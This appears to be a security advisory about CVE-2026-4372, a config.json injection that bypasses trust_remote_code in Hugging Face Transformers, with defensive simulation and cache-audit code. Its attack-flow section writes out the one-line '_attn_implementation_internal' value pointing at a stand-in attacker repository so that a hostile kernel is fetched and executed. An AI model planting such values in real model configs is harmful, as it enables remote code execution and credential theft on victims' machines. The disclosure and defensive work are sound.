Pluto Security researchers disclosed CVE-2026-4372, a remote code execution vulnerability in Hugging Face Transformers versions 4.56.0 through 5.2.x. A single innocuous-looking parameter in a model's config.json bypasses the trust_remote_code=False safety flag and executes attacker-controlled code silently during model loading. The library has 2.2 billion cumulative installs. Patch to 5.3.0 immediately.

The Scale of the Problem

The Hugging Face Transformers library is the backbone of the ML ecosystem — used to load, run, and fine-tune over 1 million model variants. With 146 million monthly PyPI downloads and 161K+ GitHub stars, it's present in virtually every enterprise ML pipeline, research environment, and AI-powered product.

CVE-2026-4372 was silently patched in Transformers 5.3.0 (released March 3, 2026); every release from 4.56.0 through 5.2.x is affected. Vulnerable versions are still being downloaded 7 to 8 million times per week, roughly a quarter of all weekly installations.

Metric                               Value
-----------------------------------  ----------------------
Cumulative installs                  2.2 billion+
Monthly PyPI downloads               146 million
Vulnerable-version weekly downloads  7–8 million
Affected version range               4.56.0 – 5.2.x
Patched version                      5.3.0 (March 3, 2026)
CVE ID                               CVE-2026-4372
Severity                             High

How the Attack Works: Three Design Flaws Combine

No single bug enables this exploit. It's the combination of three independent design decisions that creates the vulnerability.

Step 1: Unfiltered setattr on model loading

When you call AutoModelForCausalLM.from_pretrained("model-name"), the library downloads the model's config.json and weights from the Hub and applies every key in config.json to the configuration object the model is built from via setattr, without filtering out internal or private (underscore-prefixed) fields.

Step 2: Unprotected _attn_implementation_internal parameter

This internal parameter controls which attention implementation the model uses (Flash Attention, SDPA, or the default eager implementation). Because it arrives through the same unfiltered setattr, an external config.json can set it to any value, including values the library was never meant to accept from an untrusted file.

Step 3: Unsandboxed kernel loader

hub_kernels.py checks _attn_implementation_internal. If the value has the shape owner/repository, the loader treats it as a reference to a repository on the Kernels Hub, downloads that kernel, and executes it without sandboxing.

Attack flow:
1. Attacker uploads a malicious kernel to their own Hugging Face repository
2. Attacker adds one line to the model's config.json:
   "_attn_implementation_internal": "attacker-org/malicious-kernel"
3. Victim loads the model; the malicious kernel is fetched and executes silently

The trust_remote_code=False flag, the safety control users rely on to block custom modeling code shipped with a model, provides no protection here: the kernel download path described above is a separate mechanism that this flag does not govern.
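A simplified model of how the three decisions combine, as an added example that is not code from Transformers or from Pluto Security: a stand-in Config class, the unfiltered setattr next to a filtered one, and a dispatcher that treats an owner/repository value as a Hub kernel reference. Nothing is downloaded or executed; select_attention only reports what would be loaded. The class and function names, the BUILTIN_ATTENTION set and the MALICIOUS_CONFIG_JSON sample are constructed for this example, and the allow_hub_kernels opt-in is one possible hardening, not the fix Hugging Face shipped.

```python
import json

# The three attention implementations the article names. The library's real
# allowlist is longer; this set is illustrative, not authoritative.
BUILTIN_ATTENTION = {"eager", "sdpa", "flash_attention_2"}

# Constructed config.json modelled on the attack flow above (sample data).
MALICIOUS_CONFIG_JSON = """
{
  "model_type": "llama",
  "hidden_size": 4096,
  "_attn_implementation_internal": "attacker-org/malicious-kernel"
}
"""


class Config:
    """Stand-in for a configuration object whose private field selects attention."""

    def __init__(self):
        self.model_type = None
        self.hidden_size = None
        self._attn_implementation_internal = None  # None means "use the default"


def apply_config_unfiltered(cfg, raw):
    """Step 1 as described: every key, private or not, lands on the object."""
    for key, value in raw.items():
        setattr(cfg, key, value)
    return cfg


def apply_config_filtered(cfg, raw):
    """Hardened variant: private keys are never taken from untrusted JSON."""
    rejected = []
    for key, value in raw.items():
        if key.startswith("_"):
            rejected.append(key)
            continue
        setattr(cfg, key, value)
    return cfg, rejected


def select_attention(cfg, allow_hub_kernels=False):
    """Step 3 as described: an 'owner/repo' value selects a Hub kernel.

    Returns what *would* be loaded; nothing is fetched or run here. Requiring
    an explicit allow_hub_kernels opt-in is the hardening: a Hub reference that
    merely arrived via config data is refused.
    """
    impl = cfg._attn_implementation_internal or "eager"
    if not isinstance(impl, str):
        raise ValueError(f"attention implementation must be a string, got {type(impl).__name__}")
    if impl in BUILTIN_ATTENTION:
        return ("builtin", impl)
    if "/" in impl:
        if not allow_hub_kernels:
            raise ValueError(f"refusing Hub kernel {impl!r}: Hub kernels not explicitly enabled")
        return ("hub_kernel", impl)
    raise ValueError(f"unknown attention implementation {impl!r}")


def load_vulnerable(config_json):
    """Unfiltered setattr + permissive dispatch: the combination the CVE describes."""
    cfg = apply_config_unfiltered(Config(), json.loads(config_json))
    return select_attention(cfg, allow_hub_kernels=True)


def load_hardened(config_json):
    """Filtered setattr + opt-in dispatch: private key dropped, default attention used."""
    cfg, rejected = apply_config_filtered(Config(), json.loads(config_json))
    return select_attention(cfg), rejected


if __name__ == "__main__":
    print("vulnerable:", load_vulnerable(MALICIOUS_CONFIG_JSON))
    print("hardened:  ", load_hardened(MALICIOUS_CONFIG_JSON))
```

Note that either hardening alone closes this particular path: dropping private keys means the dispatcher never sees the attacker's value, and requiring an explicit opt-in means a value that slipped through is still refused. Defense in depth is to do both.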

Immediate action checklist:
1. Upgrade: pip install --upgrade "transformers>=5.3.0"
2. Search all cached config.json files (default cache ~/.cache/huggingface/hub, or wherever HF_HOME / HF_HUB_CACHE points) for _attn_implementation_internal
3. Rotate cloud credentials, API tokens, and SSH keys as a precaution if you have loaded any untrusted models recently

Why GPU Environments Are Most at Risk

The exploit requires the optional kernels package to be installed. In practice that is little comfort: developers who want GPU-accelerated inference typically install it, and enterprise ML platforms and GPU clusters routinely install all optional dependencies to maximize hardware utilization.

As the Pluto Security researchers put it: "Users who work with GPU-accelerated inference — arguably the most valuable targets — are the most likely to have it installed."

What Attackers Can Steal

Asset category           Examples
-----------------------  ------------------------------------------
Cloud credentials        AWS, GCP, Azure access keys
AI/ML API keys           OpenAI, Anthropic, HuggingFace tokens
CI/CD pipeline secrets   GitHub Actions, GitLab CI credentials
Infrastructure access    SSH keys, Kubernetes configs, Vault tokens

Recent context: One month before this disclosure, a malicious HuggingFace repository impersonating a new OpenAI Privacy Filter model release reached the #1 trending spot on the platform within 18 hours and was downloaded 244,000 times before removal. AI model supply chain attacks are no longer theoretical.

Defense Recommendations

Pluto Security and Hugging Face recommend:

  1. Upgrade to Transformers 5.3.0 immediately — the patch is available now
  2. Audit cached models — search all local config.json files for _attn_implementation_internal
  3. Sandbox model loading — run model loading inside isolated containers without host credential access or unrestricted network egress
  4. Scan configs before loading — check for unexpected fields, especially those prefixed with underscore, before loading any model configuration
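One way to carry out the cache audit from the immediate action checklist and items 2 and 4 of the list above, as an added example rather than tooling from Pluto Security or Hugging Face. It checks whether the installed transformers version falls in the affected range and whether the kernels package is present, then walks a Hub cache for config.json files and flags _attn_implementation_internal (critical when the value has the owner/repository shape) plus any other underscore-prefixed key. Assumptions: the cache layout models--owner--name/snapshots/<hash>/config.json, the KNOWN_PRIVATE_KEYS allowlist (saved configs commonly carry _name_or_path, so it is excluded to cut noise; extend it for your own models), and make_sample_cache, which writes constructed test data to a temporary directory.

```python
import json
import re
import tempfile
from importlib import metadata
from pathlib import Path

FLAGGED_KEY = "_attn_implementation_internal"
# Looks like a Hub repo reference ("owner/repository"), the shape the kernel loader dispatches on.
HUB_REPO_RE = re.compile(r"^[A-Za-z0-9][\w.-]*/[\w.-]+$")
# Private keys that legitimately appear in saved configs (assumption: extend for your models).
KNOWN_PRIVATE_KEYS = {"_name_or_path"}


def is_vulnerable_version(version):
    """True when a transformers version string falls inside 4.56.0 - 5.2.x."""
    m = re.match(r"^(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version {version!r}")
    return (4, 56) <= (int(m.group(1)), int(m.group(2))) < (5, 3)


def environment_exposure():
    """Report the two preconditions: a vulnerable transformers and the optional kernels package."""
    report = {}
    for pkg in ("transformers", "kernels"):
        try:
            report[pkg] = metadata.version(pkg)
        except metadata.PackageNotFoundError:
            report[pkg] = None
    report["vulnerable_transformers"] = (
        report["transformers"] is not None and is_vulnerable_version(report["transformers"])
    )
    report["kernels_installed"] = report["kernels"] is not None
    return report


def audit_config(path):
    """Return one finding per suspicious key in a single config.json."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError) as exc:
        return [{"file": str(path), "key": None, "value": None, "severity": f"unreadable: {exc}"}]
    if not isinstance(data, dict):
        return []
    findings = []
    for key, value in data.items():
        if key == FLAGGED_KEY:
            hub_ref = isinstance(value, str) and HUB_REPO_RE.match(value) is not None
            severity = "critical" if hub_ref else "high"
        elif key.startswith("_") and key not in KNOWN_PRIVATE_KEYS:
            severity = "review"
        else:
            continue
        findings.append({"file": str(path), "key": key, "value": value, "severity": severity})
    return findings


def audit_cache(root):
    """Walk a Hub cache (default ~/.cache/huggingface/hub) and audit every config.json."""
    findings = []
    for path in sorted(Path(root).rglob("config.json")):
        findings.extend(audit_config(path))
    return findings


def make_sample_cache():
    """Constructed cache with one benign and one malicious snapshot (test data, not real models)."""
    root = Path(tempfile.mkdtemp(prefix="hf-audit-"))
    benign = root / "models--example--benign" / "snapshots" / "aaaa" / "config.json"
    evil = root / "models--attacker-org--model" / "snapshots" / "bbbb" / "config.json"
    for p in (benign, evil):
        p.parent.mkdir(parents=True)
    benign.write_text(json.dumps({"model_type": "llama", "_name_or_path": "example/benign"}))
    evil.write_text(json.dumps({
        "model_type": "llama",
        "_attn_implementation_internal": "attacker-org/malicious-kernel",
        "_custom_private_field": 1,
    }))
    return root


if __name__ == "__main__":
    print(environment_exposure())
    # Point audit_cache at Path.home() / ".cache/huggingface/hub" (or HF_HUB_CACHE) for a real audit.
    for f in audit_cache(make_sample_cache()):
        print(f["severity"], f["file"], f["key"], "=", f["value"])
```

A "review" finding is not proof of compromise; underscore-prefixed keys that your own tooling writes will show up too. A "critical" finding (the flagged key carrying a repository reference) in a model you did not author is the signal to treat the host as exposed and follow the credential-rotation step.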

Key Takeaways

  • CVE-2026-4372 enables RCE via a single config.json field, bypassing trust_remote_code=False
  • Affects Transformers 4.56.0–5.2.x; patched in 5.3.0 (released March 3, 2026)
  • Vulnerable versions still downloaded 7–8 million times per week
  • GPU inference environments — enterprise ML platforms and GPU clusters — are the highest-risk targets
  • Upgrade immediately + audit cached configs + rotate credentials

CVE-2026-4372 is a reminder that the AI supply chain attack surface extends well beyond package registries into model repositories, configuration files, and inference infrastructure. The exploit is trivial to execute, the blast radius is enormous, and the patch is already available. There is no reason to remain on a vulnerable version.